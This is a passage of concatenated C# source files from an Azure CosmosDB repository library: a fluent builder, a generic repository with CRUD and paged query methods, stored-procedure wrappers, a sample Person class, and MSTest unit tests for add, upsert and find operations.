public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15, TParam16 param16)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14, param15, param16);
}
}
}<file_sep>using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Linq;
namespace CosmosDbRepository.Sample
{
class Person
{
[JsonProperty(PropertyName = "id")]
public string FullName => $"{FirstName} {LastName}";
[JsonProperty(PropertyName = "first")]
public string FirstName { get; set; }
[JsonProperty(PropertyName = "last")]
public string LastName { get; set; }
[JsonProperty(PropertyName = "birthday")]
public DateTime Birthday { get; set; }
[JsonProperty(PropertyName = "phoneNumbers")]
public Collection<PhoneNumber> PhoneNumbers { get; set; }
[JsonProperty(PropertyName = "allThings")]
public Dictionary<string, string> AllThings { get; set; }
[JsonConverter(typeof(EpochConverter), EpochUnits.Milliseconds)]
[JsonProperty(PropertyName = "_ts")]
public DateTime Modified { get; set; }
[JsonProperty(PropertyName = "_etag")]
public string ETag { get; set; }
public override string ToString()
{
var phones = PhoneNumbers.Any() ? string.Join(", ", PhoneNumbers.Select(p => p.ToString())) : "-";
return string.Format($"{FirstName} {LastName}, Birthday {Birthday:MM-dd-yyyy} Phone numbers: {phones}");
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
namespace CosmosDbRepository.Implementation
{
internal class CosmosDb
: ICosmosDb
{
private readonly IDocumentClient _client;
private readonly AsyncLazy<Database> _database;
private readonly string _id;
private readonly int? _defaultThroughput;
private readonly List<ICosmosDbRepository> _repositories;
Task<string> ICosmosDb.SelfLinkAsync => SelfLinkAsync();
public CosmosDb(IDocumentClient client, string databaseId, int? defaultThroughput, IEnumerable<ICosmosDbRepositoryBuilder> repositories)
{
if (string.IsNullOrWhiteSpace(databaseId))
{
throw new ArgumentException("Invalid name", nameof(databaseId));
}
_client = client ?? throw new ArgumentNullException(nameof(client));
_id = databaseId;
_defaultThroughput = defaultThroughput;
_database = new AsyncLazy<Database>(() => GetOrCreateDatabaseAsync());
_repositories = repositories.Select(cb => cb.Build(_client, this, _defaultThroughput)).ToList();
}
public async Task<string> SelfLinkAsync() => (await _database).SelfLink;
public ICosmosDbRepository<T> Repository<T>(string name)
{
return (ICosmosDbRepository<T>)_repositories.First(r => r.Id == name);
}
public ICosmosDbRepository<T> Repository<T>()
{
return (ICosmosDbRepository<T>)_repositories.First(r => r.Type == typeof(T));
}
public async Task<bool> DeleteAsync(RequestOptions options = null)
{
var response = await _client.DeleteDatabaseAsync(await SelfLinkAsync(), options);
return response.StatusCode == HttpStatusCode.NoContent;
}
public async Task Init()
{
await _database;
foreach (var repo in _repositories)
{
await repo.Init();
}
}
private async Task<Database> GetOrCreateDatabaseAsync()
{
var database = _client.CreateDatabaseQuery().Where(db => db.Id == _id).AsEnumerable().FirstOrDefault();
return database != null
? database
: await _client.CreateDatabaseAsync(new Database { Id = _id });
}
}
}<file_sep>using Microsoft.Azure.Documents.Client;
namespace CosmosDbRepository.Sample
{
public class DocumentClientSettings
{
public string EndpointUrl { get; set; }
public string AuthorizationKey { get; set; }
public ConnectionPolicy ConnectionPolicy { get; set; }
}
}<file_sep>namespace CosmosDbRepositoryTest
{
public class EnvironmentConfig
{
public bool DeleteDatabaseOnClose { get; set; }
public bool RandomizeDbName { get; set; }
public bool RandomizeCollectionName { get; set; }
public bool DeleteCollectionsOnClose { get; set; }
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryFindFirstTests
: CosmosDbRepositoryStringTests
{
[TestMethod]
public async Task FindFirst_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData
};
data = await context.Repo.AddAsync(data);
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData);
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data);
}
}
[TestMethod]
public async Task FindFirst_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData);
foundData.Should().BeNull();
}
}
[TestMethod]
public async Task FindFirst_MultipleRecords_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData, q => q.OrderByDescending(d => d.Rank));
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data2);
foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data);
}
}
}
}
<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest
{
public class ComplexTestData<T> : TestData<T>
{
[JsonProperty("tag")]
public string Tag { get; set; }
[JsonProperty("xRefId")]
public string XRefId { get; set; }
[JsonProperty("date")]
public DateTimeOffset Date { get; set; }
[JsonProperty("childItems")]
public ChildTestData[] ChildItems { get; set; }
}
public class ChildTestData
{
[JsonProperty("booleanValue")]
public bool BooleanValue { get; set; }
[JsonProperty("grandchildItems")]
public GrandchildTestData[] GrandchildItems { get; set; }
}
public class GrandchildTestData
{
[JsonProperty("dataType")]
public string DataType { get; set; }
[JsonProperty("dataCategory")]
public string DataCategory { get; set; }
[JsonProperty("createdAt")]
public DateTime CreatedAt { get; set; }
[JsonProperty("numericValue")]
public float NumericValue { get; set; }
}
}
<file_sep>using Microsoft.Azure.Documents;
using System;
namespace CosmosDbRepository
{
public interface ICosmosDbBuilder
{
ICosmosDbBuilder WithId(string name);
ICosmosDbBuilder WithDefaultThroughput(int? defaultThroughput);
ICosmosDbBuilder AddCollection<T>(string id = null, Action<ICosmosDbRepositoryBuilder> func = null);
ICosmosDb Build(IDocumentClient client);
}
}
<file_sep>using CosmosDbRepository.Implementation;
using Microsoft.Azure.Documents;
using System;
using System.Collections.Generic;
using System.Linq;
namespace CosmosDbRepository
{
public class CosmosDbBuilder
: ICosmosDbBuilder
{
private List<ICosmosDbRepositoryBuilder> _collectionBuilders = new List<ICosmosDbRepositoryBuilder>();
private int? _defaultThroughput;
public string Id { get; private set; }
public ICosmosDbBuilder WithId(string Id)
{
if (this.Id != null) throw new InvalidOperationException("Id already set");
if (string.IsNullOrWhiteSpace(Id))
{
throw new ArgumentException("Invalid database id", nameof(Id));
}
this.Id = Id;
return this;
}
public ICosmosDbBuilder WithDefaultThroughput(int? defaultThroughput)
{
_defaultThroughput = defaultThroughput;
return this;
}
public ICosmosDbBuilder AddCollection<T>(string id = null, Action<ICosmosDbRepositoryBuilder> func = null)
{
id = GetCollectionName<T>(id);
if (string.IsNullOrWhiteSpace(id))
{
throw new ArgumentException("Invalid collection id", nameof(id));
}
var builder = new CosmosDbRepositoryBuilder<T>()
.WithId(id);
_collectionBuilders.Add(builder);
func?.Invoke(builder);
return this;
}
public ICosmosDb Build(IDocumentClient client)
{
if (string.IsNullOrWhiteSpace(Id)) throw new InvalidOperationException("Id not specified");
var documentDb = new CosmosDb(client, Id, _defaultThroughput, _collectionBuilders);
return documentDb;
}
private string GetCollectionName<T>(string name)
{
if (name != null)
return name;
var attrib = typeof(T).GetCustomAttributes(false).OfType<CosmosDbRepositoryNameAttribute>().SingleOrDefault();
return attrib?.Name ?? typeof(T).Name;
}
}
}
<file_sep>using System;
using System.Collections.Concurrent;
using System.Linq;
using System.Linq.Expressions;
using System.Reflection;
namespace CosmosDbRepository.Implementation
{
internal static class ObjectExtensions
{
private static readonly ConcurrentDictionary<Type, Func<object, object>> _copiers = new ConcurrentDictionary<Type, Func<object, object>>();
public static T ShallowCopy<T>(this T source)
where T : new()
{
Func<object, object> Factory(Type type)
{
var properties = type.GetProperties().Where(i => i.CanRead && i.CanWrite).Cast<MemberInfo>()
.Concat(type.GetFields().Where(i => !i.IsInitOnly && !i.IsLiteral));
var o = Expression.Parameter(typeof(object), "o");
var src = Expression.Variable(type, "src");
var body = Expression.Block(new[] { src },
Expression.Assign(src, Expression.Convert(o, type)),
Expression.MemberInit(Expression.New(type), properties.Select(i => Expression.Bind(i, Expression.PropertyOrField(src, i.Name)))));
return Expression.Lambda<Func<object, object>>(body, o).Compile();
}
return (T)_copiers.GetOrAdd(source.GetType(), Factory)(source);
}
}
}
<file_sep>using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.DocId
{
[TestClass]
public class CosmosDbRepositoryAddTests
: CosmosDbRepositoryTests<TestData<DocumentId>>
{
[TestMethod]
public async Task Add_Expect_Success_AsInt()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = (int)DateTime.Now.Ticks,
Data = "My Data"
};
await context.Repo.AddAsync(data);
}
}
[TestMethod]
public async Task Add_Expect_Conflict_AsInt()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = (int)DateTime.Now.Ticks,
Data = "My Data"
};
await context.Repo.AddAsync(data);
var faultedTask = context.Repo.AddAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
}
}
[TestMethod]
public async Task Add_Expect_Success_AsGuid()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
}
}
[TestMethod]
public async Task Add_Expect_Conflict_AsGuid()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
var faultedTask = context.Repo.AddAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
}
}
[TestMethod]
public async Task Add_Expect_Success_AsString()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = $"MyId{DateTime.Now.Ticks}",
Data = "My Data"
};
await context.Repo.AddAsync(data);
}
}
[TestMethod]
public async Task Add_Expect_Conflict_AsString()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = $"MyId{DateTime.Now.Ticks}",
Data = "My Data"
};
await context.Repo.AddAsync(data);
var faultedTask = context.Repo.AddAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
}
}
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryUpsertTests
: CosmosDbRepositoryStringTests
{
[TestMethod]
public async Task Upsert_New_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<string>
{
Id = GetNewId(),
Data = "My Data"
};
await context.Repo.UpsertAsync(data);
}
}
[TestMethod]
public async Task Upsert_Added_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<string>
{
Id = GetNewId(),
Data = "My Data"
};
data = await context.Repo.AddAsync(data);
await context.Repo.UpsertAsync(data);
}
}
[TestMethod]
public async Task Upsert_Expect_PreconditionFailed()
{
using (var context = CreateContext())
{
var data = new TestData<string>
{
Id = GetNewId(),
Data = "My Data"
};
data = await context.Repo.AddAsync(data);
await context.Repo.UpsertAsync(data);
var faultedTask = context.Repo.UpsertAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.PreconditionFailed);
}
}
}
}
<file_sep>using CosmosDbRepository.Types;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Azure.Documents.Linq;
using Newtonsoft.Json;
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Net;
using System.Reflection;
using System.Threading.Tasks;
namespace CosmosDbRepository.Implementation
{
internal class CosmosDbRepository<T>
: ICosmosDbRepository<T>
{
private readonly IDocumentClient _client;
private readonly ICosmosDb _documentDb;
private readonly IndexingPolicy _indexingPolicy;
private readonly FeedOptions _defaultFeedOptions;
private readonly int? _throughput;
private readonly List<StoredProcedure> _storedProcedures;
private AsyncLazy<DocumentCollection> _collection;
private static readonly ConcurrentDictionary<Type, Func<object, (string id, string eTag)>> _idETagHelper = new ConcurrentDictionary<Type, Func<object, (string id, string eTag)>>();
public string Id { get; }
public Type Type => typeof(T);
public Task<string> AltLink => GetAltLink();
public CosmosDbRepository(IDocumentClient client,
ICosmosDb documentDb,
string id,
IndexingPolicy indexingPolicy,
int? throughput,
IEnumerable<StoredProcedure> storedProcedures)
{
_documentDb = documentDb;
_client = client;
Id = id;
_indexingPolicy = indexingPolicy;
_throughput = throughput;
_storedProcedures = new List<StoredProcedure>(storedProcedures);
_defaultFeedOptions = new FeedOptions
{
EnableScanInQuery = true,
EnableCrossPartitionQuery = true
};
_collection = new AsyncLazy<DocumentCollection>(() => GetOrCreateCollectionAsync());
}
public async Task<T> AddAsync(T entity, RequestOptions requestOptions = null)
{
var addedDoc = await _client.CreateDocumentAsync((await _collection).SelfLink, entity, requestOptions);
return JsonConvert.DeserializeObject<T>(addedDoc.Resource.ToString());
}
public async Task<T> ReplaceAsync(T entity, RequestOptions requestOptions = null)
{
(string id, string eTag) = GetIdAndETag(entity);
if (eTag != null)
{
requestOptions = requestOptions ?? new RequestOptions();
requestOptions.AccessCondition = new AccessCondition { Type = AccessConditionType.IfMatch, Condition = eTag };
}
var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";
var response = await _client.ReplaceDocumentAsync(documentLink, entity, requestOptions);
return (response.StatusCode == HttpStatusCode.NotModified)
? entity
: JsonConvert.DeserializeObject<T>(response.Resource.ToString());
}
public async Task<T> UpsertAsync(T entity, RequestOptions requestOptions = null)
{
(string id, string eTag) = GetIdAndETag(entity);
if (eTag != null)
{
requestOptions = requestOptions ?? new RequestOptions();
requestOptions.AccessCondition = new AccessCondition { Type = AccessConditionType.IfMatch, Condition = eTag };
}
var response = await _client.UpsertDocumentAsync((await _collection).SelfLink, entity, requestOptions);
return JsonConvert.DeserializeObject<T>(response.Resource.ToString());
}
public async Task<IList<T>> FindAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
.ConditionalWhere(predicate)
.ConditionalApplyClauses(clauses)
.AsDocumentQuery();
var results = new List<T>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
results.AddRange(response);
}
return results;
}
public async Task<CosmosDbRepositoryPagedResults<T>> FindAsync(int pageSize, string continuationToken, Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
feedOptions.RequestContinuation = continuationToken;
feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.ConditionalWhere(predicate)
.ConditionalApplyClauses(clauses)
.AsDocumentQuery();
var result = new CosmosDbRepositoryPagedResults<T>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
result.Items.AddRange(response);
if (pageSize > 0 && result.Items.Count >= pageSize)
{
result.ContinuationToken = response.ResponseContinuation;
break;
}
}
return result;
}
public async Task<IList<U>> SelectAsync<U>(Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
.Select(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var results = new List<U>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
results.AddRange(response);
}
return results;
}
public async Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U>(int pageSize, string continuationToken, Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
feedOptions.RequestContinuation = continuationToken;
feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.Select(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var result = new CosmosDbRepositoryPagedResults<U>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
result.Items.AddRange(response);
if (pageSize > 0 && result.Items.Count >= pageSize)
{
result.ContinuationToken = response.ResponseContinuation;
break;
}
}
return result;
}
public async Task<IList<U>> SelectAsync<U, V>(Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
.ApplyClauses(whereClauses)
.Select(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var results = new List<U>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
results.AddRange(response);
}
return results;
}
public async Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U, V>(int pageSize, string continuationToken, Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
feedOptions.RequestContinuation = continuationToken;
feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.ApplyClauses(whereClauses)
.Select(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var result = new CosmosDbRepositoryPagedResults<U>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
result.Items.AddRange(response);
if (pageSize > 0 && result.Items.Count >= pageSize)
{
result.ContinuationToken = response.ResponseContinuation;
break;
}
}
return result;
}
public async Task<IList<TResult>> SelectManyAsync<TResult>(Expression<Func<T, IEnumerable<TResult>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<TResult>, IQueryable<TResult>> selectClauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.ConditionalApplyClauses(whereClauses)
.SelectMany(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var results = new List<TResult>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<TResult>().ConfigureAwait(true);
results.AddRange(response);
}
return results;
}
public async Task<CosmosDbRepositoryPagedResults<TResult>> SelectManyAsync<TResult>(int pageSize, string continuationToken, Expression<Func<T, IEnumerable<TResult>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<TResult>, IQueryable<TResult>> selectClauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
feedOptions.RequestContinuation = continuationToken;
feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.ConditionalApplyClauses(whereClauses)
.SelectMany(selector)
.ConditionalApplyClauses(selectClauses)
.AsDocumentQuery();
var result = new CosmosDbRepositoryPagedResults<TResult>();
while (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<TResult>().ConfigureAwait(true);
result.Items.AddRange(response);
if (pageSize > 0 && result.Items.Count >= pageSize)
{
result.ContinuationToken = response.ResponseContinuation;
break;
}
}
return result;
}
public async Task<int> CountAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
return await _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
.ConditionalWhere(predicate)
.ConditionalApplyClauses(clauses)
.CountAsync();
}
public async Task<T> FindFirstOrDefaultAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
feedOptions.MaxItemCount = 1;
var query =
_client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
.ConditionalWhere(predicate)
.ConditionalApplyClauses(clauses)
.AsDocumentQuery();
T result = default(T);
if (query.HasMoreResults)
{
var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
result = response.FirstOrDefault();
}
return result;
}
public async Task<T> GetAsync(T entity, RequestOptions requestOptions = null)
{
(string id, string eTag) = GetIdAndETag(entity);
if (eTag != null)
{
requestOptions = requestOptions ?? new RequestOptions();
requestOptions.AccessCondition = new AccessCondition { Type = AccessConditionType.IfNoneMatch, Condition = eTag };
}
var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";
T result;
try
{
var response = await _client.ReadDocumentAsync<T>(documentLink, requestOptions);
result = (response.StatusCode == HttpStatusCode.NotModified)
? entity
: response.Document;
}
catch (DocumentClientException e)
{
if (e.StatusCode != HttpStatusCode.NotFound)
throw;
result = default(T);
}
return result;
}
public async Task<T> GetAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(itemId.Id)}";
T result;
try
{
var response = await _client.ReadDocumentAsync<T>(documentLink, requestOptions);
result = response.Document;
}
catch (DocumentClientException e)
{
if (e.StatusCode != HttpStatusCode.NotFound)
throw;
result = default(T);
}
return result;
}
public async Task<bool> DeleteDocumentAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(itemId.Id)}";
var response = await _client.DeleteDocumentAsync(documentLink, requestOptions);
return response.StatusCode == HttpStatusCode.NoContent;
}
public async Task<bool> DeleteDocumentAsync(T entity, RequestOptions requestOptions = null)
{
(string id, string eTag) = GetIdAndETag(entity);
if (eTag != null)
{
requestOptions = (requestOptions ?? new RequestOptions()).ShallowCopy();
requestOptions.AccessCondition = new AccessCondition { Type = AccessConditionType.IfMatch, Condition = eTag };
}
var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";
var response = await _client.DeleteDocumentAsync(documentLink, requestOptions);
return response.StatusCode == HttpStatusCode.NoContent;
}
public async Task<bool> DeleteAsync(RequestOptions requestOptions = null)
{
var response = await _client.DeleteDocumentCollectionAsync((await _collection).SelfLink, requestOptions);
_collection = new AsyncLazy<DocumentCollection>(async () => await GetOrCreateCollectionAsync());
return response.StatusCode == HttpStatusCode.NoContent;
}
public Task Init() => _collection.Value;
public IStoredProcedure<TResult> StoredProcedure<TResult>(string id) => new StoreProcedureImpl<TResult>(_client, this, id);
public IStoredProcedure<TParam,TResult> StoredProcedure<TParam,TResult>(string id) => new StoreProcedureImpl<TParam,TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TResult> StoredProcedure<TParam1, TParam2, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TResult> StoredProcedure<TParam1, TParam2, TParam3,TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(_client, this, id);
